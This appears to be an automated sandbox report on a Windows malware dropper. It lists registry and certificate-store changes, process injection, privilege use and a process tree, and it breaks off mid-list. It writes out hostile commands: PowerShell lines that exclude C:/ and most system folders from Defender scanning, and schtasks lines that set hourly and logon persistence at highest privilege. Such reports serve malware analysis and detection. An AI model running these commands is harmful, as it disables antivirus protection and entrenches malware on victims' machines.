Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	4363463463464363463463463.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

comSvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execomSvc.exe

pid	process
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
2980	powershell.exe
2928	powershell.exe
2936	powershell.exe
1624	powershell.exe
2976	powershell.exe
2988	powershell.exe
2128	powershell.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe
1836	comSvc.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

4363463463464363463463463.exeghjkl.execomSvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe4363463463464363463463463.exeghjkl.execomSvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1712	4363463463464363463463463.exe
Token: SeDebugPrivilege	1656	ghjkl.exe
Token: SeDebugPrivilege	1836	comSvc.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	1712	4363463463464363463463463.exe
Token: SeDebugPrivilege	1656	ghjkl.exe
Token: SeDebugPrivilege	1836	comSvc.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	2128	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

dota.exedota.exe

pid process

1844 dota.exe
1844 dota.exe

pid	process
1844	dota.exe
1844	dota.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exefund.exePresentationFontCache.exeWScript.execmd.execomSvc.exe

description	pid	process	target process
PID 1712 wrote to memory of 2796	1712	4363463463464363463463463.exe	abtc8mhlbehqil.exe
PID 1712 wrote to memory of 2796	1712	4363463463464363463463463.exe	abtc8mhlbehqil.exe
PID 1712 wrote to memory of 2796	1712	4363463463464363463463463.exe	abtc8mhlbehqil.exe
PID 1712 wrote to memory of 2796	1712	4363463463464363463463463.exe	abtc8mhlbehqil.exe
PID 1712 wrote to memory of 1656	1712	4363463463464363463463463.exe	ghjkl.exe
PID 1712 wrote to memory of 1656	1712	4363463463464363463463463.exe	ghjkl.exe
PID 1712 wrote to memory of 1656	1712	4363463463464363463463463.exe	ghjkl.exe
PID 1712 wrote to memory of 1656	1712	4363463463464363463463463.exe	ghjkl.exe
PID 1712 wrote to memory of 440	1712	4363463463464363463463463.exe	fund.exe
PID 1712 wrote to memory of 440	1712	4363463463464363463463463.exe	fund.exe
PID 1712 wrote to memory of 440	1712	4363463463464363463463463.exe	fund.exe
PID 1712 wrote to memory of 440	1712	4363463463464363463463463.exe	fund.exe
PID 440 wrote to memory of 2260	440	fund.exe	WScript.exe
PID 440 wrote to memory of 2260	440	fund.exe	WScript.exe
PID 440 wrote to memory of 2260	440	fund.exe	WScript.exe
PID 440 wrote to memory of 2260	440	fund.exe	WScript.exe
PID 1712 wrote to memory of 1844	1712	4363463463464363463463463.exe	dota.exe
PID 1712 wrote to memory of 1844	1712	4363463463464363463463463.exe	dota.exe
PID 1712 wrote to memory of 1844	1712	4363463463464363463463463.exe	dota.exe
PID 1712 wrote to memory of 1844	1712	4363463463464363463463463.exe	dota.exe
PID 1712 wrote to memory of 1252	1712	4363463463464363463463463.exe	PresentationFontCache.exe
PID 1712 wrote to memory of 1252	1712	4363463463464363463463463.exe	PresentationFontCache.exe
PID 1712 wrote to memory of 1252	1712	4363463463464363463463463.exe	PresentationFontCache.exe
PID 1712 wrote to memory of 1252	1712	4363463463464363463463463.exe	PresentationFontCache.exe
PID 1252 wrote to memory of 2080	1252	PresentationFontCache.exe	PresentationFontCache.exe
PID 1252 wrote to memory of 2080	1252	PresentationFontCache.exe	PresentationFontCache.exe
PID 1252 wrote to memory of 2080	1252	PresentationFontCache.exe	PresentationFontCache.exe
PID 1712 wrote to memory of 2996	1712	4363463463464363463463463.exe	rty47.exe
PID 1712 wrote to memory of 2996	1712	4363463463464363463463463.exe	rty47.exe
PID 1712 wrote to memory of 2996	1712	4363463463464363463463463.exe	rty47.exe
PID 1712 wrote to memory of 2996	1712	4363463463464363463463463.exe	rty47.exe
PID 2260 wrote to memory of 1548	2260	WScript.exe	cmd.exe
PID 2260 wrote to memory of 1548	2260	WScript.exe	cmd.exe
PID 2260 wrote to memory of 1548	2260	WScript.exe	cmd.exe
PID 2260 wrote to memory of 1548	2260	WScript.exe	cmd.exe
PID 1548 wrote to memory of 1836	1548	cmd.exe	comSvc.exe
PID 1548 wrote to memory of 1836	1548	cmd.exe	comSvc.exe
PID 1548 wrote to memory of 1836	1548	cmd.exe	comSvc.exe
PID 1548 wrote to memory of 1836	1548	cmd.exe	comSvc.exe
PID 1836 wrote to memory of 2588	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2588	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2588	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 1624	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 1624	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 1624	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2812	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2812	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2812	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2744	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2744	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2744	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2928	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2928	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2928	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2936	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2936	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2936	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2748	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2748	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2748	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2972	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2972	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2972	1836	comSvc.exe	powershell.exe
PID 1836 wrote to memory of 2976	1836	comSvc.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712

C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe
"C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe"
2⤵
- Executes dropped EXE
PID:2796

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
3⤵
PID:2856

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
"C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:440

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1548

C:\DriverHostCrtNet\comSvc.exe
"C:\DriverHostCrtNet\comSvc.exe"
5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
6⤵
PID:2588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
6⤵
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
6⤵
PID:1360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
6⤵
PID:2972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
6⤵
PID:2748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
6⤵
PID:2744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E2FgvhS1mJ.bat"
6⤵
PID:1496

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:1944

C:\Windows\security\templates\sppsvc.exe
"C:\Windows\security\templates\sppsvc.exe"
7⤵
PID:2436

C:\Users\Admin\AppData\Local\Temp\Files\dota.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dota.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1844

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2256

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2888

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\ZV7eVaE21uid5jxWl7NM.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\ZV7eVaE21uid5jxWl7NM.exe"
3⤵
PID:1948

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login
4⤵
PID:656

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:656 CREDAT:275457 /prefetch:2
5⤵
PID:2188

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
4⤵
PID:1092

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1092 CREDAT:275457 /prefetch:2
5⤵
PID:1816

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video
4⤵
PID:2540

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2540 CREDAT:275457 /prefetch:2
5⤵
PID:1080

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/
4⤵
PID:528

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:528 CREDAT:275457 /prefetch:2
5⤵
PID:2500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
4⤵
PID:2008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5ec9758,0x7fef5ec9768,0x7fef5ec9778
5⤵
PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:2
5⤵
PID:3484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:8
5⤵
PID:3292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1540 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:8
5⤵
PID:2028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2320 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:1
5⤵
PID:4464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2336 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:1
5⤵
PID:4256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2484 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:1
5⤵
PID:4888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2580 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:1
5⤵
PID:4668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
4⤵
PID:620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef5ec9758,0x7fef5ec9768,0x7fef5ec9778
5⤵
PID:2232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1120 --field-trial-handle=1316,i,10943236253123169351,10087494818679386714,131072 /prefetch:2
5⤵
PID:3948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1448 --field-trial-handle=1316,i,10943236253123169351,10087494818679386714,131072 /prefetch:8
5⤵
PID:4148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
4⤵
PID:2560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef5ec9758,0x7fef5ec9768,0x7fef5ec9778
5⤵
PID:2916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1300,i,9862607139499187944,4938552534353982555,131072 /prefetch:2
5⤵
PID:4344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1300,i,9862607139499187944,4938552534353982555,131072 /prefetch:8
5⤵
PID:4488

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
4⤵
PID:1512

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
5⤵
PID:2428

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.0.1847585710\2049542454" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1240 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c979145-b38c-4835-9fcf-7c4d86a96016} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 1360 104d6558 gpu
6⤵
PID:3796

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.1.1633118680\1700515620" -parentBuildID 20221007134813 -prefsHandle 1536 -prefMapHandle 1532 -prefsLen 21610 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {023dace7-f17f-4516-b66c-675a99289ade} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 1564 d71b58 socket
6⤵
PID:3440

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.2.818679831\49724775" -childID 1 -isForBrowser -prefsHandle 2064 -prefMapHandle 2060 -prefsLen 21648 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f591a21-7f07-4fbf-8455-fe78988a963f} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 2076 10460458 tab
6⤵
PID:3712

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.3.1650749980\958252343" -childID 2 -isForBrowser -prefsHandle 2756 -prefMapHandle 2752 -prefsLen 26111 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e50f22aa-b99f-4c9a-8c58-c1aabdee50fa} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 2804 d60958 tab
6⤵
PID:4752

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
4⤵
PID:1764

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
5⤵
PID:2240

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2240.0.2086310896\2117576311" -parentBuildID 20221007134813 -prefsHandle 1028 -prefMapHandle 1016 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8537a397-08d6-48d7-890f-4b4973c3890b} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" 1180 e9d8658 gpu
6⤵
PID:3488

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2240.1.1350491070\1084910472" -parentBuildID 20221007134813 -prefsHandle 1292 -prefMapHandle 1288 -prefsLen 17601 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6432b577-25f3-4fde-a3d8-fd6e438a3760} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" 1304 e844e58 socket
6⤵
PID:4332

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
4⤵
PID:1408

C:\Program Files\Mozilla Firefox\firefox.exe
